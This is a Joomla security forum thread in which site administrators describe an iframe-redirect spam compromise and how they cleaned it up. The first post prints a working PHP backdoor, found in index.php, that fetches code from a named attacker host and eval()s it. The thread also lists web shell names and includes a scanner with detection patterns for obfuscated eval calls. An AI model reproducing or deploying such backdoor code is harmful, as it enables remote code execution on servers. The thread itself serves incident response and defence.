iframe injection ID Hack to Joomla

Discussion regarding Joomla! security issues.

ripplestone
Joomla! Apprentice
Posts: 7
Joined: Tue Aug 26, 2008 10:26 pm

iframe injection ID Hack to Joomla

Post by ripplestone » Thu Nov 06, 2008 7:08 am

The Joomla site I work on has been hacked. After hours of research and attempts to fix it, we are left not knowing how it works or how to stop it.

What is happening is that certain content on the site sends the user to a completely different spammer site, within an iframe, 100% width 100% height.
The iframe code is not simply sitting in some file; we have searched all over for it...


More Information:
Joomla! 1.0.13 Stable (just upgraded to Joomla! 1.15 while trying to fix it)
Apache, PHP 4.4.7
MySQL 4.1.19

Host: Rackspace

3rd party extensions:
FireBoard 1.0.4
Community Builder: 1.1
Feed2post: 1.5
seyret: 0.2.7.8
Phil-A-Form v1.6.7

Backup: yes, 1 week ago. But the hacker may have been tampering before then.

Permissions: Folder permissions may have been tampered with. The hacker definitely has some passwords.

Additional Information:

We found and removed some code, that included a link to:
km20725. keymachine. de
keymachine .de

as well as some code that looks like this:


eval(gzinflate(base64_decode('FZzHjqRaFkU/p9...............3//+Hw==')));
Also the following code was in the index.php


// Backdoor found in index.php: whenever a request carries a ?go= parameter, it opens a
// socket to the attacker's host, sends the site name and the go value, reads the whole
// HTTP response, and eval()s the response body as PHP. The attacker can thus run any
// code on the server on demand without storing it in a file.
if(isset($_GET['go'])) {
    $sock = @fsockopen('km20725.keymachine.de', 80);
    if($sock){
        fwrite ($sock, 'GET http://km20725.keymachine.de/server1/index.php?host='.$_SERVER['SERVER_NAME'].'&go='.$_GET['go'].' HTTP/1.0'."\r\n");
        fwrite ($sock, 'Host: km20725.keymachine.de'."\r\n\r\n");
        while($content[] = fgets ($sock));   // read every line of the response into an array
        $content = implode('', $content);
        // skip the HTTP headers (everything before the blank line) and execute the body
        @eval(trim(substr($content, strpos($content, "\r\n\r\n"))));
        fclose ($sock);
    }
}

Any help or information would be GREATLY appreciated!!!!!!!!

ripplestone
Joomla! Apprentice
Posts: 7
Joined: Tue Aug 26, 2008 10:26 pm

Re: iframe injection ID Hack to Joomla

Post by ripplestone » Fri Nov 07, 2008 6:31 pm

Google has found thousands of Spam entries on our site from the attack:
<EDIT Link Removed>

We have found and removed the following hacker tools installed on our
server:

sToRm7shell
C99madShell
k1b0rg Doorway Loader

We found that the "eval(gzinflate(base64_decode('FZzHjqRaFkU/p9...............3//+Hw==')));" code mentioned in the first post was encrypted PHP code for c99madShell

We have decided to re-load Joomla, and migrate the database.

While loading modules and plugins for the freshly installed Joomla site, my PC desktop was hit by a virus. I don't know where the virus came from, but my computer won't boot up anymore.

Before it stopped being able to boot, multiple applications were running that were malicious. Including the following:

sysin.scr
vm ben2tali.exx
Command Service CMDService
rjwnw63m.exe

Firefox and IE kept popping up and trying to access:
(do not visit the following site)
antispyknight. biz/ 155

By that time I had already unplugged the internet.

We will continue working on repairing this attack, and post here again in the next few days.

ripplestone
Joomla! Apprentice
Posts: 7
Joined: Tue Aug 26, 2008 10:26 pm

Re: iframe injection ID Hack to Joomla

Post by ripplestone » Mon Nov 10, 2008 9:44 pm

We have successfully rebuilt the site. The spam problem and iframe hack have been resolved.

I also had to re-load my desktop. I'll try Ubuntu for a while.

Something I didn't mention before:
The spammer was primarily using the keyword: [* spam *], and linked to a pharmacy directory.

The hacker was skilled, but his intentions were misguided. It's unfortunate that he wasted so much of his and our time.

"Force without wisdom falls of its own weight."
-- Horace (65 BC - 8 BC), Odes

clubrob
Joomla! Fledgling
Posts: 3
Joined: Thu Nov 13, 2008 1:50 pm

Re: iframe injection ID Hack to Joomla

Post by clubrob » Mon Nov 17, 2008 8:39 pm

Having almost the exact problem on the two sites I maintain. Rebuilding the entire site is going to be a measure of last resort because there's so much data involved.

I've cleaned out all the bad code I could find, and I've been poring over my PHP files for over a week and haven't found any more. But specific URLs are still redirecting, and I can't figure out how. I could really use some help here.

One site is using mod_rewrite, and one has it turned off. Both are having the iframe issue. Something I thought was interesting was if I escape the last ampersand in the URL (the one in the view&id=22 phrase) with & the browser goes to the proper page instead of redirecting.

Is there somewhere else that scripts could be running besides in the actual php files? On our DNS? In the database?

mandville
Joomla! Master
Posts: 15152
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: iframe injection ID Hack to Joomla

Post by mandville » Mon Nov 17, 2008 11:01 pm

Check your cron jobs also; they may have set one to reinfect.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

clubrob
Joomla! Fledgling
Posts: 3
Joined: Thu Nov 13, 2008 1:50 pm

Re: iframe injection ID Hack to Joomla

Post by clubrob » Wed Nov 19, 2008 9:35 pm

Thanks for the suggestion, mandville. I checked the cron jobs, and they look clean.

I learned from going through my apache logs that a main vulnerability was in an old extcalendar component that had never been deleted from the site (I'm new at this job, and I inherited kind of a mess). URL injection was occurring at an astonishing rate. I deleted that component (did I mention it wasn't even in use anymore? sheesh). And the hole seems to be plugged now.

The previous web administrators didn't appear to do anything to secure their joomla installations. I had to change the php.ini settings to the recommendations in the Joomla security forum. And many of the file and folder permissions were set incorrectly. Register globals was ON when I first gained access to the backend of these sites (my first clue that we were probably compromised). So I've been cleaning up a pretty bad mess.

As for my infected files, I found redirect scripts inserted in the main index.php, pathway.php, the template index.php, and in the editor/editor.php files. The scripts were both plain PHP and base64 encoded. I also found stand-alone PHP files with what appeared to be random 5-character string file names. I think these were the c99madShell files. I found them in the images, media, and template folders, and in the main Joomla folder. They were all base64 encoded. (Decoder for base64 code: http://www.3dmobility.com/decrypt2.php Start from "eval" and include the semicolon at the end.)

Once I had the main holes plugged and the dangerous php functions switched off, I cleaned out all the malicious scripts and files. So far so good. All my sites are still using Joomla 1.0.15, and my next project will be migrating all three to 1.5. Hopefully I can hold the line until then.

The most useful tool in all this was poring over Apache logs. Look for any weird POST requests. Look for anyone trying to insert external URLs into your URLs.

Also, if malicious redirection is your problem, check every file that your main index.php includes. That's how I found the scripts in the editor.php file.

It's been a stressful first month at this new job!!!

mandville
Joomla! Master
Posts: 15152
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: iframe injection ID Hack to Joomla

Post by mandville » Wed Nov 19, 2008 11:53 pm

sounds like good work, puts the old admin to shame!

intrigue
Joomla! Apprentice
Posts: 19
Joined: Tue Oct 10, 2006 11:45 pm

Re: iframe injection ID Hack to Joomla

Post by intrigue » Thu Feb 04, 2010 7:07 am

Also check out this if you have a lot of hidden code/redirect links injected into your home page with this sort of hack....

http://www.viddler.com/explore/jeradhill/videos/43/

The video helps you get rid of the text/code from the page. It's hidden in the page content, but you'll have to remove it from the database. In some ways I think the other files on the server are meant to be decoys... as you end up hitting your head against the wall trying to find the files that are putting the hidden links in the page when it's in the database instead. A bit of a mind f#%k

Just my 2 cents to the cause
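As an added example (not code from this thread, from Joomla, or from any poster), a small Python scanner that applies the two log heuristics clubrob describes (external URLs inside query strings, PHP executing from asset folders) together with pattern checks for the eval()-wrapped decoders found in the injected files and for the full-size or hidden iframe that ends up in page content or database rows, as intrigue describes. The log lines, the `com_example` path, the `ab3kz.php` file name and the `attacker.example` host are all constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache access-log lines (not from the thread). Line 2 carries an external
# URL as a parameter value; line 3 is a POST to a randomly named PHP file under images/.
SAMPLE_LOG = """\
203.0.113.5 - - [17/Nov/2008:20:39:01 +0000] "GET /index.php?option=com_content&task=view&id=22 HTTP/1.1" 200 5120
203.0.113.9 - - [17/Nov/2008:20:40:12 +0000] "GET /components/com_example/example.php?cfg=http://attacker.example/x.txt HTTP/1.0" 200 812
203.0.113.9 - - [17/Nov/2008:20:41:03 +0000] "POST /images/ab3kz.php HTTP/1.0" 200 1201
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
EXTERNAL_URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
ASSET_DIRS = ("/images/", "/media/", "/templates/")  # PHP should never execute from here

def suspicious_requests(log_text):
    """Return (reason, request target) pairs for log lines matching either heuristic."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = m.group("target")
        parts = urlsplit(target)
        if any(EXTERNAL_URL_RE.match(v) for _, v in parse_qsl(parts.query, keep_blank_values=True)):
            hits.append(("external URL in query string", target))
        if parts.path.endswith(".php") and parts.path.startswith(ASSET_DIRS):
            hits.append(("PHP executed from asset directory", target))
    return hits

# eval() wrapped around a decoder: the shape of the injected scripts found in the thread.
OBFUSCATED_EVAL_RE = re.compile(
    r"eval\s*\(\s*(?:gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(", re.IGNORECASE)
# A full-page (100% width/height) or invisible iframe, as described for the redirect.
HIDDEN_IFRAME_RE = re.compile(
    r"<iframe[^>]*(?:width\s*=\s*[\"']?100%|height\s*=\s*[\"']?100%|display\s*:\s*none)", re.IGNORECASE)

def obfuscated_eval(source):
    """True if PHP source evals the output of a decoder (typical encoded web shell)."""
    return bool(OBFUSCATED_EVAL_RE.search(source))

def hidden_iframe(html):
    """True if HTML (a file, or a content row pulled from the database) embeds a full-size or hidden iframe."""
    return bool(HIDDEN_IFRAME_RE.search(html))

if __name__ == "__main__":
    for reason, target in suspicious_requests(SAMPLE_LOG):
        print(f"{reason}: {target}")
```

Run `hidden_iframe` over the introtext/fulltext columns of your content rows as well as over files, since, as the posts above note, the injected markup can live only in the database.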

mandville
Joomla! Master
Posts: 15152
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: iframe injection ID Hack to Joomla

Post by mandville » Thu Feb 04, 2010 12:53 pm

if your site is hacked you have to check everywhere, who knows what they have done to your site.

intrigue
Joomla! Apprentice
Posts: 19
Joined: Tue Oct 10, 2006 11:45 pm

Re: iframe injection ID Hack to Joomla

Post by intrigue » Thu Feb 04, 2010 7:43 pm

Totally agree Mandville, but that was covered quite nicely by others above.

What I was trying to point out is that I'd already done the run around to find the hacked files on the server but kept coming back to why there was hidden code still being injected into the homepage.... which was frustrating as you think that you've missed something on the server and keep going back to check which is super time consuming (especially when it turns out what you are chasing is not in the place you are looking).

Then I found this link (shown in my previous post), which highlighted that the injected code was in fact completely separate from the hacked files on the server and was hidden in the DB instead....

Goes to show you need to look past the obvious sometimes... otherwise you end up going in circles.

mandville
Joomla! Master
Posts: 15152
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: iframe injection ID Hack to Joomla

Post by mandville » Thu Feb 04, 2010 10:54 pm

intrigue wrote:Totally agree Mandville, but that was covered quite nicely by others above.

Goes to show you need to look past the obvious sometimes... otherwise you end up going in circles.
Exactly. This very old topic has been repeated in several places, and some people don't read beyond the first and last post.

Topic set to auto lock due to age

yoomark
Joomla! Apprentice
Posts: 15
Joined: Fri Jun 11, 2010 4:49 pm

Re: iframe injection ID Hack to Joomla

Post by yoomark » Mon Jul 05, 2010 9:01 am

I searched Google today for hacking of Joomla and I found this. But I see this is for Joomla 1.0, so I'm happy because I am using 1.5.18 :)
